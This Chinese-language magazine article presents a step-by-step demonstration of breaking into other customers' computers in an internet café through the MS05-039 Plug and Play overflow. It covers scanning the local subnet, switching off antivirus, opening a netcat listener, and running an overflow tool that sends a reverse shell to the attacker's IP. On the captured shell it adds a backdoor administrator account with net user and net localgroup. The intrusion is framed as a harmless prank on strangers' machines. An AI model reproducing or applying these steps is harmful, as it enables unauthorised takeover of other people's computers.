溫　鵬

筆者的朋友小王是個黑客愛好者，有時一起去網(wǎng)吧他要搞點小“破壞”，進行所謂的侵入式攻擊，當作無聊時的“游戲”?？墒且恢绷罟P者不解的就是，他每次都能輕易得手。究竟是什么攻擊會這么“霸道”呢？經過筆者一番“軟磨硬套”后，小王舉了一個例子來示范。

提示

本文以Windows即插即用遠程代碼執(zhí)行漏洞（MS05-039）為例，造成該漏洞的主要原因是即插即用服務中未經檢查的緩沖區(qū)出現(xiàn)了溢出漏洞，受影響的系統(tǒng)主要包括Windows 2000 SP4和Windows XP SP1。

補丁地址：http://www.microsoft.com/china/technet/security/bulletin/MS05-039.mspx。

掃描檢測

首先下載MS05039漏洞掃描工具（http://www.foundstone.com/），這個安全小工具只是用于檢測系統(tǒng)是否存在MS05039漏洞，不具備攻擊功能。下載解壓后運行其中的MS05039Scan.exe，在主界面中，先填寫要掃描的范圍。通常局域網(wǎng)內電腦的IP都分配在192.168.0.1到192.168.0.254之間，如果此時想對所在的網(wǎng)吧做一次整體掃描，就在開始IP的標簽處，輸入192.168.0.1的IP地址，然后在下面結束IP的標簽處，輸入相對應的192.168.0.254的IP地址（圖1）。

確定起始IP地址之后，單擊下面的“掃描”按鈕，這時在下方會逐個顯示出內網(wǎng)的所有電腦，以及對這些電腦掃描的結果（圖2）。圖2中目前所選中的信息條，就是內網(wǎng)機器中含有MS05039漏洞的主機。

在掃描結果欄目內，顯示主機Status標簽為Not vulnerable的字符，代表該主機不含有MS05039溢出漏洞。如果Status標簽內，出現(xiàn)的是vulnerable字符，則此主機含有MS05039溢出漏洞。

守株待兔

下面要做的是監(jiān)聽本機端口，等待意外收獲。

提到監(jiān)聽本機端口，自然會想到大名鼎鼎的瑞士軍刀NC工具，它以短小精悍著稱，在網(wǎng)上找到它并不是什么難事。由于有些殺毒軟件要對NC工具報警，為了省去麻煩，先關閉殺毒軟件的實時監(jiān)控以及按訪問掃描，然后將它下載到C盤中。

單擊“開始”菜單，選擇“運行”，打開“運行”對話框。在“打開”標簽處輸入CMD命令，然后敲擊“回車”鍵。在彈出的命令窗體中，轉換目錄到NC程序所在的位置。在命令行處輸入“NC–vv–l–p51”的命令，然后敲擊“回車”鍵，即可實現(xiàn)對本機51端口的監(jiān)聽（圖3）。

在剛才執(zhí)行的NC命令中：-vv參數(shù)代表顯示更詳細的監(jiān)聽內容；-l代表連接端口關閉后，仍然繼續(xù)監(jiān)聽；-p進行本地端口監(jiān)聽，后跟數(shù)字就是所要監(jiān)聽的端口號。

溢出攻擊

“天羅地網(wǎng)”布下了，現(xiàn)在開始“引誘”主機，讓它自投羅網(wǎng)，“鉆進”已經設下的陷阱，從而能夠省去“徒勞無功”的等待時間。

小知識

SHELL是指操作系統(tǒng)的最外層，管理著用戶與操作系統(tǒng)交互、通訊、執(zhí)行等操作。如果能得到對方的SHELL，也就代表著擁有了與對方計算機直接溝通、下達命令的平臺。

為了抓住這些含有MS05039溢出漏洞的機器，還要下載MS05039溢出工具。打開一個新的C M D命令行窗口，切換到MS05039溢出工具的目錄內。在命令行下輸入MS05039.exe192.168.0.89 192.168.0.55 511。溢出192.168.0.89是對方的IP，接收溢出信息的是本機192.168.0.55，51是接收端口。最后參數(shù)代表溢出模式，可選1和0，是根據(jù)不同的版本補丁來定的。如果此機器剛才用掃描器確實檢測出含有溢出漏洞，但是用0總是溢出不成功，我們可以換成1。

按下“回車”鍵后，開始“引誘式”溢出攻擊，稍微等待幾秒鐘后（圖4），屏幕就會顯示出帶有英文字符的OK，這簡單地說就是溢出成功的意思。

返回到NC監(jiān)聽界面，此時就會發(fā)現(xiàn)已經獲取到了對方的SHELL。接下來就在該SHELL平臺中，敲入net user WENPENG 123456 /ADD的命令，將“WENPENG”賬號添加到被入侵主機內，再用net localgroup提升這個賬號到管理員組。

隨后就可以使用遠程客戶端軟件，直接輸入剛剛建立的用戶名，進行遠程“惡作劇”了。也能使用其他第三方軟件連接控制等，這類方法很多，可以靈活運用。

本文中所涉及到的圖表、注解、公式等內容請以PDF格式閱讀原文。